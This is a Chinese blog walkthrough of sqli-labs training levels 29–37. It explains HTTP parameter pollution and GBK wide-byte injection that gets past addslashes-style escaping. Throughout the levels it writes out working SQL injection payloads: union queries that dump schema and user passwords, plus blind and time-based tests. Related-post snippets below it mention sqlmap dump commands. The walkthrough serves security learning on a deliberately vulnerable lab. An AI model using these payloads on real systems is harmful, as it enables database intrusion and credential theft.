sqli-labs通关攻略教程——双服务器+宽字节注入(less29~less37)

已于 2022-07-14 11:27:45 修改
阅读量419 收藏 1
点赞数 1
分类专栏: sqli-labs靶场通关 文章标签: SQL注入
于 2021-08-11 10:58:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55854679/article/details/119575609
版权
本文详细介绍了通过Docker搭建的sqli-labs靶场,逐步揭示了服务器两层架构下的SQL注入漏洞利用过程,包括闭合方式测试、盲注技巧、宽字节注入方法等,涉及数据库查询、表和字段的探测。内容涵盖了从单引号到双引号闭合,从数字型注入到宽字节注入的多种情况,对于理解SQL注入和安全防护具有实践意义。
摘要由CSDN通过智能技术生成

文章目录


从29关开始使用docker搭建的sqli-labs靶场
KALI搭建Docker+Vulhub和sqli-labs靶场

补充知识-服务器的两层架构

mysql之注入天书服务器

服务器两层架构即不同的id值有不同的服务器来解读。
http参数污染:jsp/tomcat使用getgetParameter("id")获取到第一个值,php/apache使用$_GET["id"]获取的是第二个值,那么第一个id就是纯数字,第二个id的值注入就可以了。

less 29

  1. 测试发现闭方式为单引号
    在这里插入图片描述

  2. 使用order by查询字段,结果为3在这里插入图片描述

  3. 使用联合注入,查看回显位置

?id=-1' union select 1,2,3--+

在这里插入图片描述
4. 查询数据库

?id=-1' union select 1,2,database()--+

在这里插入图片描述
5. 查询数据库中的表

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

在这里插入图片描述
6. 查询表user中的字段

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='user'--+

在这里插入图片描述
7. 查询字段中的值

?id=-1' union select 1,2,group_concat(Password) from security.users--+

在这里插入图片描述
8. 总结:没有任何的过滤

less 30

  1. 经过测试后闭合方式为双引号在这里插入图片描述
  2. 使用order by字段测试,发现回显只有一种在这里插入图片描述
  3. 猜测本题使用盲注的思路。
?id=-1" or left(database(),1)='s'--+

?id=0' or 4=(select count(table_name) from information_schema.tables where table_schema=database());--+   //判断数据库中表的数量

?id=1& if(left((select table_name from information_schema.tables where table_schema='security'  limit 1,1 ),  1 )='u'--+

?id=-1" || database() regexp 's'--+

?id=-1" || substr(database(),1,1)='s'--+

ascil函数不太行,这题暂时不考虑ascil函数

?id=1" and  if(length(database())=8,1,sleep(10))--+

if函数可套用left或者substr函数或ascil函数

?id=1&id=-2" union select 1,2,3--+  //联合注入,服务器的两层架构

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

less 31

本关的闭合方式为"),其余与上一关相同,均使用盲注的思路。

less 32

  1. 首先测试闭合方式,发现无论闭合方式为什么,均被\转义。在这里插入图片描述

  2. 查看题目中的提示addslashes函数

    PHP中的addslashes函数详解

    addslashes函数的绕过方法

  3. 本道题发现依然需要使用盲注的思路,经过多次测试,发现也并不为数字型注入,闭合方式为单引号。由于单引号会被转义,将单引号使用url编码为%27

  4. 在这里我们使用宽字节注入的思路。宽字节注入主要是采用GBK 编码。

原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围)。我们在过滤 ' 的时候,往往利用的思路是将 ' 转换为 \'。(\ascil码是92,换成十六进制为5c%5curl编码。

%df吃掉 \ 具体的原因是 urlencode(‘) = %5c%27,我们在%5c%27 前面添加%df,形成%df%5c%27,而上面提到的 mysqlGBK 编码方式的时候会将两个字节当做一个汉字,此 %df%5c 就是一个汉字,%27则作为一个单独的符号在外面,同时也就达到了我们的目的。
同理,%aa、%bb均可以使用。

?id=1%aa%27 order by 3--+

?id=-1%aa%27union select 1,2,database()--+

?id=-1%aa%27union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+

?id=-1%aa%27union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

?id=-1%aa%27union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--+

在这里插入图片描述

less 33

  1. 题目中的提示addslashes()函数参考上一关的相关博客分享。
  2. 经过测试,与上一关相同,使用宽字节注入
?id=-1%aa%27 union select 1,2,3--+   //联合注入

less 34

查看题目提示,与上一关的区别在于本关传参方式为post

uname=1%aa%27 union select 1,database()#&passwd=1&submit=Submit

在这里插入图片描述

less 35

查看题目提示本关为数字型注入,闭合处不需要考虑过滤转义,但联合注入查询库中表、字段、字段中的值时需要使用十六进制来表示。

less 36

  1. 查看题目提示中的mysql_real_escape_string() 函数

    PHP中mysql_real_escape_string()函数详解

  2. 我们尝试前几关的宽字节注入方法,发现可行,且闭合方式为单引号,使用url编码%27

less 37

题目提示,与上一关的区别在于本关传参方式为POST,使用burp抓包尝试注入。

poggioxay
关注
专栏目录
sqlilabs通关()
Forrest_bear的博客
05-24 2332
就像以下代码一样:隔离空格。
sqli-labs Less-32、33、34、35、36、37sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1808
sqli-labs Less-32、33、34、35、36、37sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
sqli-labs/less-24;宽字节注入
xiaochenhang的博客
08-18 348
2、 当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸。1、在使用gbk的编码情况下,一个中文占了两个字节;中文的第一个字节加上被转义的特殊字符(\')后,转义符\会被认为是中文的第二个字节,这样单引号'就脱离了转义,形成了宽字节注入;这个语句没问题,可是'security' 两侧单引号也会被转义,这里使用嵌套查询来逃逸;4、联合查询,判断回显点;...
Sqli-labs Less32-Less33 宽字节注入
最新发布
beiweixiaotian66的博客
07-25 640
一丢丢Sqli-labs小练习
Sqlilabs通关(Less11-Less20)
wcl20010的博客
05-11 539
这十关都是POST型,使用burpsuit或者使用火狐浏览器的插件hackbar。 hackbar链接:链接:https://pan.baidu.com/s/1bIP9lOBUtoH3_D5Apkmi2w 提取码:7odr 这里我的hackbar是破解版的。注意添加后禁止更新,当然可以去插件中间下载一个新版,平时使用它,不付费不能使用post等提交请求。但是我这破解版的,再提交表单后无法发现是post还是get。挺无语的。搭配使用吧。 less-11 基于错误的POST型单引号字符型注入 这就是我上
sqli-labs搭建
墨鱼菜鸡
09-10 233
目录 sqli-labs搭建 安装phpstudy 下载 安装 启动 把sqli-labs文件移入到www目录下 ​编辑 打开靶场 搭建靶场 下载phpMyAdmin4.8.5 访问本地E:\phpstudy_pro\WWW\sqli-labs\sql-connections 修改db-creds.inc中的内容 再备份db-...
sqli-labs通关教程
m0_65150886的博客
01-23 1600
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1631
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1691
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1720
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sqli-labs通关记录
qq_39670065的博客
07-11 2793
sqli-lab通关记录 1.docker搭建 运行:docker info //查看docker信息,确认docker正常 搜索sqli-labs:docker search sqli-labs 建立镜像:docker pull acgpiano/sqli-labs 查看存在的镜像:docker images 运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命名
SQLI-LABS环境搭建
12-12
SQLI-LABS环境搭建,里面包含PhpStudy2018和sqli-labs-ma
sqli-labs通关详解
m0_52051132的博客
10-15 7033
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs通关大全(更新至Less60)
热门推荐
箭雨镜屋
09-03 1万+
sqli-labs通关(less1~less10)_箭雨镜屋-CSDN博客 sqli-labs通关(less11~less20)_箭雨镜屋-CSDN博客 sqli-labs通关(less21~less30)_箭雨镜屋-CSDN博客
sqli-labs通关攻略(全关卡)(更新中~)
C233333235的博客
07-22 622
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开关卡,提示我们将参数id填入url中。
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
Sqli-labs通关手册【1-30关】
李安北的博客
05-03 7336
1.sql注入的原理 1)sql注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。 2)登录案例讲解 主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
sqli-labs通关攻略全关卡 简单易懂(持续通关中~)
starhei.zxy的博客
07-22 338
查列:union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+确定有3列了 因为order by 4 的时候页面出错了 接着id=-1' union select 1,2,3 --+ 看一下回显点。id=-1' union select 1,database(),3 --+加个单引号 闭合判断一下。
sql-labs通关讲解
qq_70836100的博客
07-22 1031
目录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

poggioxay

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值